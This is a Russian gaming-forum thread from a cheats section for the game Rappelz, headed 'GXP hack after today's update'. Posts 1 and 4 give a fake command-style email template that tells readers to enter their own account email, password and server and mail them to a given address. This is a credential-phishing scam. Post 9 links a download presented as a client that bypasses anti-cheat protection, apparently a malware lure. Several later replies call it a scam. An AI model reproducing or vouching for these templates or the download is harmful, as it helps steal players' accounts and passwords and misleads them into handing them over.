ChemaX RF Online

Объявление

Все кто хочет получить посты за свои темы напишите мне письмо с ссылкой темы. ВНИМАНИЕ: Заголовок(тема) сообщения должно содержать: "ХОЧУ ПОСТЫ!!!". Если этого не будит вы не получите посты так как докажите свою невнимательность на форуме.

chemax.topbb.ru

Здравствуйте уважаемый пользователь, просим вас использовать код нашего баннера для размещения на своих сайтах/форумах и в замен на вашу помощь мы сделаем/установим ваш баннер на нашем форуме.
Код баннера нашего портала можно узнать в соответствующей теме

С Уважением XZey

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » ChemaX RF Online » Читы/Баги/Проги/Сервера для Rappelz » Взлом GXP после обновы сегоднешней)

Взлом GXP после обновы сегоднешней)

Сообщений 1 страница 13 из 13

1

В письме с темой: ///go to GXP531, вставить следующий текст:

_main/d///...insert /back/d/rappelz/bot login: (здесь мы вводим свой е-майл. Например: fediamalin@mail.ru)
///g/d/rappelz/bot password: (здесь свой пароль)
...insert /back/d/rappelz/ gxp: (здесь вводим сколько GXP вам необходимо Например:90.52GXP)
[/forward2folder 00123671]
mile page: 7587
8bn48bn4857bn***: do244U_admin: ********@nikitaonline.ru
///admin/pass/login/serv: (здесь сервер на котором мы играем. Например: Ангел)
client: v1.4.553
launcher: v1.541
password correct now to 4//d//rappelz insert
[go to /d/59y8n48/rappelz/bot exec bot531.bin]
Сегодня создал кому надо пользуетесь...
отправлять на новую почту они поменяли bot-rappelz@rambler.ru сегодня пробывал на эту получилось

Отредактировано Rappelz (2011-02-01 10:07:43)

2

Кто уже пробывал ?

3

Сегодня отправил опять работает!!!!

4

В письме с темой: ///go to bot227, вставить следующий текст:

_main/d///...insert /back/d/rappelz/bot login: (здесь мы вводим свой е-майл. Например: fediamalin@mail.ru)
///g/d/rappelz/bot password: (здесь свой пароль)
...insert /back/d/rappelz/ rupi: (здесь вводим сколько rupi вам необходимо Например:300кк)
[/forward2folder 00123671]
mile page: 7587
8bn48bn4857bn***: do244U_admin: ********@nikitaonline.ru
///admin/pass/login/serv: (здесь сервер на котором мы играем. Например: Ангел)
client: v1.4.553
launcher: v1.541
password correct now to 4//d//rappelz insert
[go to /d/59y8n48/rappelz/bot exec bot227.bin]
Сегодня создал кому надо пользуетесь...
отправлять на новую почту они поменяли bot-rappelz@rambler.ru сегодня пробывал на эту получилось
это на рупи!!! работает

5

НАЕБКА!!!!!!!!!!!!!!!!!!

6

Почему???

7

наеп сотрите когда пользователь был зареган таких как ты надо в мусорку пускать нуб я все провер.
- не работает support@nikita.online нуб офф настоящий адрес бота так шо мозги не епи

8

через с кока рупи предут  а то уже час жду

9

http://zalil.ru/31287588
Скачиваете дополнение к клиенту Rappelz
Проще говоря это тот же самый exe файл входя в раппелз, только вход осуществяется без nProject Game Guard....тоесть без защиты...
И соответственно При входе можно будет указать какие дополнительно вещи вы хотите иметь, стабилизаторы выносливости, рупии, либо GXP.
Рупии, Крилья мидаса, стабилизаторы выносливости будут в сундуке(у кладовщика в любом городе). GXP вы найдёте у себя на счёте зайдя на сайт игры.

Приятной игры....
Темка будет не долгой пока адмы не просекут этой фишки)) Удачной игры...

10

ыыы на ето некто неповедёца ыыы може тконешно нуб какойнебуть просто я уже проверял ыы и выгдедит как развот ты бы написал логин(ето штобы я смок пароль сменятиь) паролль(ето чтобы я увас чонить спиздил с акка) всё удачьной игры нубыыы ыыы во твас и вся прога даже вирус тотал ком малчит не каково вируса так бы твоя прога ген от трояна содержала иначе не как .

11

чо неполучилась мою почьту ламануть да пароль несменить вот жопа да да ыыыыы пароли несавпадают может ты пренесёж всёжто я хателл етож к тебе всё на почьту прешло ыыы :insane:

12

Ох пипец...Скрипт за скриптом..Сколько можно.Научитесь нормально кидать. На это уже не ведутся :D

13

Ох пипец...Скрипт за скриптом..Сколько можно.Научитесь нормально кидать. На это уже не ведутся. Фактически да НО!!! приходит школота нубы 1 лвла и тудже ищят ыч'и и всякую хуйню НО её нет а тут скрипты на деньги вау нукадайка я отпрвавлю и врезультате нехуя непалучают(если петов и шмота норм нет)  ыыы вот так вот всё пичально...

Вы здесь » ChemaX RF Online » Читы/Баги/Проги/Сервера для Rappelz » Взлом GXP после обновы сегоднешней)